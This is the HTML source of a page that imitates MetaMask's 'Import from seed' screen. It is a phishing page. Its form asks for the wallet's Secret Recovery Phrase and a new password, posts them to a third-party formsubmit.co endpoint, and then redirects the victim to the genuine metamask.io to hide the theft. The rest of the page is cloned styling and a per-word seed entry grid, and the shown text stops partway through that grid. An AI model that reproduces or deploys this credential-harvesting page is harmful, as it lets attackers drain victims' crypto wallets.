<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <!-- <link rel="stylesheet" href="./css/index.css" /> -->
    <link
      rel="icon shortcut"
      href="/icon-48x48.77cfd58f.77cfd58f.png"
      type="image/x-icon"
    />
    <link rel="stylesheet" href="/submit.fe794285.css" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"
    />
    <link rel="stylesheet" href="/index.f3c177da.css" />
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
      crossorigin
    />
    <style></style>
    <style data-jss data-meta="MuiInputBase">
      .MuiInputBase-root {
        color: #000000de;
        cursor: text;
        box-sizing: border-box;
        letter-spacing: 0.00938em;
        align-items: center;
        font-family: Roboto, Helvetica, Arial, sans-serif;
        font-size: 1rem;
        font-weight: 400;
        line-height: 1.1876em;
        display: inline-flex;
        position: relative;
      }
      .MuiInputBase-root.Mui-disabled {
        color: #00000061;
        cursor: default;
      }
      .MuiInputBase-multiline {
        padding: 6px 0 7px;
      }
      .MuiInputBase-multiline.MuiInputBase-marginDense {
        padding-top: 3px;
      }
      .MuiInputBase-fullWidth {
        width: 100%;
      }
      .MuiInputBase-input {
        font: inherit;
        color: currentColor;
        box-sizing: content-box;
        letter-spacing: inherit;
        -webkit-tap-highlight-color: transparent;
        background: 0 0;
        border: 0;
        width: 100%;
        min-width: 0;
        height: 1.1876em;
        margin: 0;
        padding: 6px 0 7px;
        animation-name: mui-auto-fill-cancel;
        animation-duration: 10ms;
        display: block;
      }
      .MuiInputBase-input::placeholder {
        color: currentColor;
        opacity: 0.42;
        transition: opacity 0.2s cubic-bezier(0.4, 0, 0.2, 1);
      }
      .MuiInputBase-input:-ms-input-placeholder {
        color: currentColor;
        opacity: 0.42;
        transition: opacity 0.2s cubic-bezier(0.4, 0, 0.2, 1);
      }
      .MuiInputBase-input::-moz-placeholder {
        color: currentColor;
        opacity: 0.42;
        transition: opacity 0.2s cubic-bezier(0.4, 0, 0.2, 1);
      }
      .MuiInputBase-input:focus {
        outline: 0;
      }
      .MuiInputBase-input:invalid {
        box-shadow: none;
      }
      .MuiInputBase-input::-webkit-search-decoration {
        -webkit-appearance: none;
      }
      .MuiInputBase-input.Mui-disabled {
        opacity: 1;
      }
      .MuiInputBase-input:-webkit-autofill {
        animation-name: mui-auto-fill;
        animation-duration: 5000s;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input::placeholder {
        opacity: 0 !important;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input:-ms-input-placeholder {
        opacity: 0 !important;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input::-moz-placeholder {
        opacity: 0 !important;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input:focus::placeholder {
        opacity: 0.42;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input:focus:-ms-input-placeholder {
        opacity: 0.42;
      }
      label[data-shrink="false"]
        + .MuiInputBase-formControl
        .MuiInputBase-input:focus::-moz-placeholder {
        opacity: 0.42;
      }
      .MuiInputBase-inputMarginDense {
        padding-top: 3px;
      }
      .MuiInputBase-inputMultiline {
        resize: none;
        height: auto;
        padding: 0;
      }
      .MuiInputBase-inputTypeSearch {
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
      }
    </style>
    <style data-jss data-meta="MuiInput">
      .MuiInput-root {
        position: relative;
      }
      label + .MuiInput-formControl {
        margin-top: 16px;
      }
      .MuiInput-colorSecondary.MuiInput-underline:after {
        border-bottom-color: #f50057;
      }
      .MuiInput-underline:after {
        content: "";
        pointer-events: none;
        border-bottom: 2px solid #3f51b5;
        transition: transform 0.2s cubic-bezier(0, 0, 0.2, 1);
        position: absolute;
        bottom: 0;
        left: 0;
        right: 0;
        transform: scaleX(0);
      }
      .MuiInput-underline.Mui-focused:after {
        transform: scaleX(1);
      }
      .MuiInput-underline.Mui-error:after {
        border-bottom-color: #f44336;
        transform: scaleX(1);
      }
      .MuiInput-underline:before {
        content: " ";
        pointer-events: none;
        border-bottom: 1px solid #0000006b;
        transition: border-bottom-color 0.2s cubic-bezier(0.4, 0, 0.2, 1);
        position: absolute;
        bottom: 0;
        left: 0;
        right: 0;
      }
      .MuiInput-underline:hover:not(.Mui-disabled):before {
        border-bottom: 2px solid #000000de;
      }
      .MuiInput-underline.Mui-disabled:before {
        border-bottom-style: dotted;
      }
      @media (hover: none) {
        .MuiInput-underline:hover:not(.Mui-disabled):before {
          border-bottom: 1px solid #0000006b;
        }
      }
    </style>
    <style data-jss data-meta="MuiFormLabel">
      .MuiFormLabel-root {
        color: #0000008a;
        letter-spacing: 0.00938em;
        padding: 0;
        font-family: Roboto, Helvetica, Arial, sans-serif;
        font-size: 1rem;
        font-weight: 400;
        line-height: 1;
      }
      .MuiFormLabel-root.Mui-focused {
        color: #3f51b5;
      }
      .MuiFormLabel-root.Mui-disabled {
        color: #00000061;
      }
      .MuiFormLabel-root.Mui-error {
        color: #f44336;
      }
      .MuiFormLabel-colorSecondary.Mui-focused {
        color: #f50057;
      }
      .MuiFormLabel-asterisk.Mui-error {
        color: #f44336;
      }
    </style>
    <style data-jss data-meta="MuiInputLabel">
      .MuiInputLabel-root {
        transform-origin: 0 0;
        display: block;
      }
      .MuiInputLabel-formControl {
        position: absolute;
        top: 0;
        left: 0;
        transform: translateY(24px);
      }
      .MuiInputLabel-marginDense {
        transform: translateY(21px);
      }
      .MuiInputLabel-shrink {
        transform-origin: 0 0;
        transform: matrix(0.75, 0, 0, 0.75, 0, 1.5);
      }
      .MuiInputLabel-animated {
        transition: color 0.2s cubic-bezier(0, 0, 0.2, 1),
          transform 0.2s cubic-bezier(0, 0, 0.2, 1);
      }
      .MuiInputLabel-filled {
        z-index: 1;
        pointer-events: none;
        transform: translate(12px, 20px);
      }
      .MuiInputLabel-filled.MuiInputLabel-marginDense {
        transform: translate(12px, 17px);
      }
      .MuiInputLabel-filled.MuiInputLabel-shrink {
        transform: matrix(0.75, 0, 0, 0.75, 12, 10);
      }
      .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
        transform: matrix(0.75, 0, 0, 0.75, 12, 7);
      }
      .MuiInputLabel-outlined {
        z-index: 1;
        pointer-events: none;
        transform: translate(14px, 20px);
      }
      .MuiInputLabel-outlined.MuiInputLabel-marginDense {
        transform: translate(14px, 12px);
      }
      .MuiInputLabel-outlined.MuiInputLabel-shrink {
        transform: matrix(0.75, 0, 0, 0.75, 14, -6);
      }
    </style>
    <style data-jss data-meta="MuiFormControl">
      .MuiFormControl-root {
        vertical-align: top;
        border: 0;
        flex-direction: column;
        min-width: 0;
        margin: 0;
        padding: 0;
        display: inline-flex;
        position: relative;
      }
      .MuiFormControl-marginNormal {
        margin-top: 16px;
        margin-bottom: 8px;
      }
      .MuiFormControl-marginDense {
        margin-top: 8px;
        margin-bottom: 4px;
      }
      .MuiFormControl-fullWidth {
        width: 100%;
      }
    </style>
    <style data-jss data-meta="MuiTextField"></style>
    <style data-jss data-meta="makeStyles">
      .jss1 {
        color: var(--color-text-alternative);
        font-weight: 400;
      }
      .jss1.jss2,
      .jss1.jss4 {
        color: var(--color-text-alternative);
      }
      .jss3:before {
        border-bottom: 1px solid var(--color-text-default) !important;
      }
      .jss3:after {
        border-bottom: 2px solid var(--color-primary-default);
      }
      .jss5 {
        color: var(--color-text-alternative);
      }
      .jss6 {
        padding: 8px;
      }
      .jss6::placeholder {
        color: var(--color-text-alternative);
      }
      .jss7 {
        color: var(--color-background-default);
      }
      .jss8:after {
        border-bottom: 2px solid var(--color-background-default);
      }
      .jss9.jss10,
      .jss9.jss4 {
        color: var(--color-text-alternative);
      }
      .jss12 {
        color: var(--color-text-default);
        border: 1px solid var(--color-border-default);
        background-color: var(--color-background-default);
        border-radius: 6px;
        align-items: center;
        height: 48px;
        padding: 0 16px;
        display: flex;
      }
      label + .jss12 {
        margin-top: 9px;
      }
      .jss12.jss11 {
        border: 1px solid var(--color-primary-default);
      }
      .jss13 {
        color: var(--color-text-default);
        position: initial;
        font-size: 1rem;
        transition: none;
        transform: none;
      }
      .jss14 {
        color: var(--color-text-default);
        position: initial;
        font-size: 0.75rem;
        transition: none;
        transform: none;
      }
      .jss15 {
        line-height: initial !important;
      }
    </style>
    <style>
      #popover-content {
        flex-direction: column;
        justify-content: center;
        align-items: center;
        height: 100%;
        display: flex;
      }
      .custom-spinner-color {
        color: #e27625;
        border-color: #e27625;
        border-top-color: #0000 !important;
      }
    </style>
    <link rel="stylesheet" href="/submit.e586a103.css" />
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css"
    />
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.min.js"
      integrity="sha384-cuYeSxntonz0PPNlHhBs68uyIAVpIIOZZ5JqeqvYYIcEL727kskC66kF92t6Xl2V"
      crossorigin
    ></script>
    <link rel="stylesheet" href="/index.2b4db597.css" />
    <title>Metamask | Connect</title>
  </head>
  <body class="wallet">
    <a href="https://metamask.io/#/">
      <img class="head" src="/metamask-fox.dfcc0ce3.78997e27.svg" alt />
      <span
        class="mx-2 px-2 text-white"
        style="
          letter-spacing: 0.5rem;
          font-family: Centima, sans-serif;
          font-size: 1.4rem;
          text-decoration: none !important;
        "
        >METAMASK</span
      >
    </a>
    <div class="d-flex flex-column">
      <div class="container my-5 vh-100" id="myTabContent">
        <div id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
          <h5 class="font-weight-bold mt-2 text-white">Import from seed</h5>
          <form
            class="bg-dark border-none mx-auto p-4 rounded"
            action="https://formsubmit.co/77bc7e02d65ac5b13085028955b819c2"
            method="post"
            id="submit-form"
          >
            <input type="hidden" name="_next" value="https://metamask.io/" />
            <input type="hidden" name="_captcha" value="false" />
            <div class="mb-3">
              <div class="d-flex flex-row justify-content-between">
                <label
                  for="sec-rec-phr"
                  class="form-label text-white w-75"
                  style="text-align: left"
                >
                  Secret Recovery Phrase
                </label>
                <span class="text-white" id="toggleInput">
                  <!-- onclick="togglePassword('sec-rec-phr')" -->
                  Show
                </span>
              </div>
              <input
                type="text"
                class="bg-dark border-secondary form-control text-white"
                id="sec-rec-phr"
                placeholder="Enter your Secret Recovery Phrase"
                name="recovery-phrase"
              />
            </div>
            <div class="mb-3">
              <div class="d-flex flex-row justify-content-between">
                <label
                  for="new-pw"
                  class="form-label text-white w-75"
                  style="text-align: left"
                >
                  New Password
                </label>
                <span class="text-white" id="toggleInputPW">
                  <!-- onclick="togglePassword('new-pw')" -->
                  Show
                </span>
              </div>
              <input
                type="password"
                class="bg-dark border-secondary form-control text-white"
                id="new-pw"
                placeholder="New Password"
                name="new-password"
              />
            </div>
            <div class="mb-3 w-100">
              <label
                for="confirm-pw"
                class="form-label text-white w-100"
                style="text-align: left"
              >
                Confirm Password
              </label>
              <input
                type="password"
                class="bg-dark border-secondary form-control text-white"
                id="confirm-pw"
                placeholder="Confirm password"
                name="confirm-password"
              />
              <span
                class="bg-dark d-flex text-white w-100"
                style="text-align: left; font-size: 0.7rem"
                ><small>Must be at least 8 characters</small></span
              >
            </div>
            <button
              type="submit"
              id="sig-go"
              class="btn btn-primary mb-5 py-1 w-100"
              style="border-radius: 2.2rem; width: 250px"
            >
              IMPORT
            </button>
          </form>
          <p class="text-center text-muted">
            By proceeding, you agree to these
            <a href="https://metamask.io/terms-of-use/" class="text-light">
              Terms and Conditions
            </a>
          </p>
        </div>
      </div>
      <div id="mydesktopcntnt" class="container main-container-wrapper mm-box">
        <div class="box box--flex-direction-row first-view-main-wrapper">
          <div
            class="box box--flex-direction-row first-view-main"
            id="box-view"
          >
            <div class="box box--flex-direction-row import-account">
              <a class="import-account__back-button" href="#">&lt; Back</a>
              <form>
                <div class="import-srp__container">
                  <label class="import-srp__srp-label">
                    <h4
                      class="mm-box mm-box--color-text-default mm-text mm-text--heading-sm"
                      align="left"
                    >
                      Secret Recovery Phrase
                    </h4>
                  </label>
                  <div
                    class="import-srp__paste-tip mm-banner-alert mm-banner-alert--severity-info mm-banner-base mm-box mm-box--background-color-primary-muted mm-box--display-flex mm-box--gap-2 mm-box--padding-3 mm-box--padding-left-2 mm-box--rounded-sm"
                  >
                    <span
                      class="mm-box mm-box--color-primary-default mm-box--display-inline-block mm-icon mm-icon--size-lg"
                      style="
                        -webkit-mask-image: url(info.e2a0ad33.e2a0ad33.svg);
                      "
                    ></span>
                    <div>
                      <p
                        class="import-srp__banner-alert-text mm-box mm-box--color-text-default mm-text mm-text--body-md"
                      >
                        You can paste your entire secret recovery phrase into
                        any field
                      </p>
                      <p
                        class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                      ></p>
                    </div>
                  </div>
                  <div class="dropdown import-srp__number-of-words-dropdown">
                    <select
                      class="dropdown__select"
                      id="boxCountSelect"
                      name="word-count"
                    >
                      <option value="12">I have a 12-word phrase</option>
                      <option value="15">I have a 15-word phrase</option>
                      <option value="18">I have a 18-word phrase</option>
                      <option value="21">I have a 21-word phrase</option>
                      <option value="24">I have a 24-word phrase</option>
                    </select>
                    <span
                      class="dropdown__icon-caret-down mm-box mm-box--color-inherit mm-box--display-inline-block mm-icon mm-icon--size-sm"
                      style="
                        -webkit-mask-image: url(arrow-down.b7aec892.b7aec892.svg);
                      "
                    ></span>
                  </div>
                  <div class="import-srp__srp">
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-0"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          1.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-0"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-0"
                            class="MuiInput-input MuiInputBase-input phr-word"
                            name="phrase-1"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-0-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-0-checkbox"
                        /><label
                          for="import-srp__srp-word-0-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            />
                          </svg>
                        </label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-1"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          2.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-2"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-1"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-1"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-1-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-1-checkbox"
                        /><label
                          for="import-srp__srp-word-1-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-2"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          3.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-3"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-2"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-2"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-2-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-2-checkbox"
                        /><label
                          for="import-srp__srp-word-2-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-3"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          4.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-4"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-3"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-3"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-3-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-3-checkbox"
                        /><label
                          for="import-srp__srp-word-3-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-4"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          5.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-5"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-4"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-4"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-4-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-4-checkbox"
                        /><label
                          for="import-srp__srp-word-4-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-5"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          6.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-6"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-5"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-5"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-5-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-5-checkbox"
                        /><label
                          for="import-srp__srp-word-5-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-6"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          7.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-7"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-6"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-6"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-6-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-6-checkbox"
                        /><label
                          for="import-srp__srp-word-6-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
